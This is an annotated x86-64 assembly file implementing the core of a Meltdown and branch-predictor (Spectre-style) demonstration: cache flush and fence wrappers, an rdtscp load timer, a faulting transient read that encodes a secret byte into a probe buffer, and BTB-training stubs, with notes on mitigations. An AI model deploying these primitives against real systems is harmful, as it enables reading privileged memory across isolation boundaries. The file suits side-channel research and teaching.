doit.S
// clflush: C-callable wrapper around the CLFLUSH instruction (AT&T syntax).
// In:  rdi = any address inside the cache line to flush
// Out: none; no general-purpose register is written
// The label shares its name with the mnemonic; the assembler tells them apart by position.
        .globl  clflush
clflush:
        clflush (%rdi)                  // evict the line holding *rdi from the cache hierarchy
        ret
// mfence: C-callable wrapper around the MFENCE instruction (AT&T syntax).
// In:  none
// Out: none; no general-purpose register is written
// Earlier loads and stores become globally visible before any later load or store.
        .globl  mfence
mfence:
        mfence                          // full load/store fence
        ret
// measure_access_time: time one 8-byte load from the address in rdi.
// In:  rdi = pointer to read (first integer argument, SysV AMD64 convention)
// Out: rax = second rdtscp reading minus the first (low 32 bits of the TSC only)
// Clobbers: rdx and rcx (both written by rdtscp; caller-saved in SysV), flags.
// Context: a short result means the line was already cached. This is the timing
// primitive behind cache side channels, and it pairs with the clflush wrapper above.
.global measure_access_time
measure_access_time:
// rdi is overwritten by the load below and rbx is callee-saved, so both are saved.
push %rdi
push %rbx
// rbx = start timestamp. rdtscp returns the counter in edx:eax; only eax
// (zero-extended into rax) is kept, edx is ignored.
rdtscp
mov %rax, %rbx
// The timed access: load 8 bytes from *rdi. The loaded value is discarded
// (rdi is restored from the stack before returning).
mov (%rdi), %rdi
// rax = end timestamp (eax only) - start timestamp
rdtscp
sub %rbx, %rax
// NOTE(review): because edx is dropped, the difference is wrong if the low
// 32 bits of the TSC wrap between the two readings.
pop %rbx
pop %rdi
ret
// do_access: the transient-execution sequence of this Meltdown demonstration.
// In:  rdi = our_buffer (base of the probe buffer), rsi = address to read
// Out: no return value is set. al is only a scratch target of the faulting load.
// Saves and restores rbx, rdi and rsi; the pushes and pops are balanced.
// after_exception is exported, presumably so that a fault handler installed
// elsewhere can resume execution there. The handler is not in this file, confirm.
// Defender note: kernel page-table isolation (KPTI) and CPUs that do not forward
// data from a faulting load are the mitigations for this pattern. On such systems
// the dependent load below should not observe privileged data.
.global do_access
do_access:
push %rbx
push %rdi
push %rsi
// Cause an exception now. This will make the code below happen only speculatively
// (load from absolute address 0; assumes page 0 is unmapped so the load faults).
movb (0x0), %al
// Do the Meltdown illegal access (rsi is ptr param)
// Only bl is written; the upper bits of rbx are not cleared in this function.
movb (%rsi), %bl
// rbx <<= 12, i.e. scale by 4096 so each byte value selects a different 4 KiB offset.
shl $0xc, %rbx
// rdi is our_buffer param
// Load from our_buffer + rbx. The value is discarded; the access itself is the point.
mov (%rdi, %rbx, 1), %rbx
.global after_exception
after_exception:
// Restore in reverse push order. This relies on rsp still matching the pushes
// above when control arrives here.
pop %rsi
pop %rdi
pop %rbx
ret
// The following will be moved to correct virtual addresses to fool the branch predictor
// btb_call: make one indirect call through rdi, then return.
// In:  rdi = address to call (first integer argument, SysV AMD64 convention)
// Out: whatever the called code leaves in registers; nothing is saved or restored here.
// The copy to other virtual addresses is done elsewhere and is not visible in this file.
// Defender note: indirect-branch predictor training of this kind is what mitigations
// such as retpoline and IBPB are aimed at.
// NOTE(review): rsp is not realigned before the call, so the target is entered with
// the stack off the SysV alignment. That is harmless for a target like btb_gadget,
// which only returns. Confirm no other target is passed.
.global btb_call
btb_call:
callq *%rdi
ret
// btb_gadget: a function consisting of a single ret; it reads and writes no registers.
// Per the comment above btb_call in this file, it is meant to be relocated together
// with btb_call. Presumably it is the benign target passed to btb_call in rdi. Confirm
// against the caller.
.global btb_gadget
btb_gadget:
ret